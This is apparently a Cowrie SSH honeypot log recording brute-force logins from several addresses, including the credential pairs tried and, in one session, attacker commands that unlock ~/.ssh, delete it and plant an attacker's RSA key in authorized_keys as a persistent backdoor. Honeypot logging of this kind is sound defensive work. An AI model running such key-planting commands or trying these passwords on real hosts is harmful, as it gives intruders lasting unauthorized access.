{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.437745Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40010,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f6cd1b1f71c","protocol":"ssh","message":"New connection: 212.227.235.229:40010 (1.2.3.4:22) [session: 5f6cd1b1f71c]","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.533996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.538637Z","src_ip":"212.227.235.229","session":"5f6cd1b1f71c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.638324Z","src_ip":"212.227.235.229","session":"5f6cd1b1f71c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:43.041775Z","src_ip":"212.227.235.229","session":"5f6cd1b1f71c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:44.237379Z","src_ip":"212.227.235.229","session":"5f6cd1b1f71c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40016,"dst_ip":"1.2.3.4","dst_port":22,"session":"31443fafb0ef","protocol":"ssh","message":"New connection: 212.227.235.229:40016 (1.2.3.4:22) [session: 31443fafb0ef]","sensor":"my-vps","timestamp":"2025-09-08T13:41:44.344764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:44.345469Z","src_ip":"212.227.235.229","session":"31443fafb0ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:44.450721Z","src_ip":"212.227.235.229","session":"31443fafb0ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:44.951627Z","src_ip":"212.227.235.229","session":"31443fafb0ef"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:45.057065Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:45.058479Z","src_ip":"212.227.235.229","session":"31443fafb0ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45910,"dst_ip":"1.2.3.4","dst_port":22,"session":"e017bbed16e9","protocol":"ssh","message":"New connection: 212.227.235.229:45910 (1.2.3.4:22) [session: e017bbed16e9]","sensor":"my-vps","timestamp":"2025-09-08T13:41:46.746079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:46.747531Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:46.974961Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ1qaz","message":"login attempt [root/!QAZ1qaz] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:47.919976Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:48.426475Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:48.427197Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:48.428017Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:48.656819Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:49.162394Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.163126Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.391226Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.392116Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46890,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a06106e8aa1","protocol":"ssh","message":"New connection: 212.227.235.229:46890 (1.2.3.4:22) [session: 0a06106e8aa1]","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.615556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.617213Z","src_ip":"212.227.235.229","session":"0a06106e8aa1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:49.841364Z","src_ip":"212.227.235.229","session":"0a06106e8aa1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:50.750390Z","src_ip":"212.227.235.229","session":"0a06106e8aa1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:51.984244Z","src_ip":"212.227.235.229","session":"0a06106e8aa1"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38118,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf8cc52a7c54","protocol":"ssh","message":"New connection: 134.199.174.250:38118 (1.2.3.4:22) [session: bf8cc52a7c54]","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.177501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.178448Z","src_ip":"134.199.174.250","session":"bf8cc52a7c54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47586,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f73cd953fb6","protocol":"ssh","message":"New connection: 212.227.235.229:47586 (1.2.3.4:22) [session: 0f73cd953fb6]","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.210867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.219375Z","src_ip":"212.227.235.229","session":"0f73cd953fb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.446048Z","src_ip":"212.227.235.229","session":"0f73cd953fb6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:41:52.575412Z","src_ip":"134.199.174.250","session":"bf8cc52a7c54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56814,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ffe5d997afa","protocol":"ssh","message":"New connection: 212.227.235.229:56814 (1.2.3.4:22) [session: 2ffe5d997afa]","sensor":"my-vps","timestamp":"2025-09-08T13:41:53.739139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:53.740171Z","src_ip":"212.227.235.229","session":"2ffe5d997afa"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123","message":"login attempt [mysql/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:53.758791Z","src_ip":"134.199.174.250","session":"bf8cc52a7c54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:53.860574Z","src_ip":"212.227.235.229","session":"2ffe5d997afa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:53.916292Z","src_ip":"212.227.235.229","session":"0f73cd953fb6"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:54.149830Z","src_ip":"212.227.235.229","session":"e017bbed16e9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:54.151164Z","src_ip":"212.227.235.229","session":"0f73cd953fb6"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"2025","message":"login attempt [hacker/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:54.383928Z","src_ip":"212.227.235.229","session":"2ffe5d997afa"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:55.094020Z","src_ip":"134.199.174.250","session":"bf8cc52a7c54"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:55.506023Z","src_ip":"212.227.235.229","session":"2ffe5d997afa"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":35140,"dst_ip":"1.2.3.4","dst_port":22,"session":"607ea58b1943","protocol":"ssh","message":"New connection: 134.199.174.250:35140 (1.2.3.4:22) [session: 607ea58b1943]","sensor":"my-vps","timestamp":"2025-09-08T13:42:21.858867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:42:21.863828Z","src_ip":"134.199.174.250","session":"607ea58b1943"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:42:22.144335Z","src_ip":"134.199.174.250","session":"607ea58b1943"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"qwerty123","message":"login attempt [mysql/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:42:23.348457Z","src_ip":"134.199.174.250","session":"607ea58b1943"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:24.604998Z","src_ip":"134.199.174.250","session":"607ea58b1943"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":37929,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb47e18d5993","protocol":"ssh","message":"New connection: 49.247.35.31:37929 (1.2.3.4:22) [session: fb47e18d5993]","sensor":"my-vps","timestamp":"2025-09-08T13:42:34.539922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:42:34.555067Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
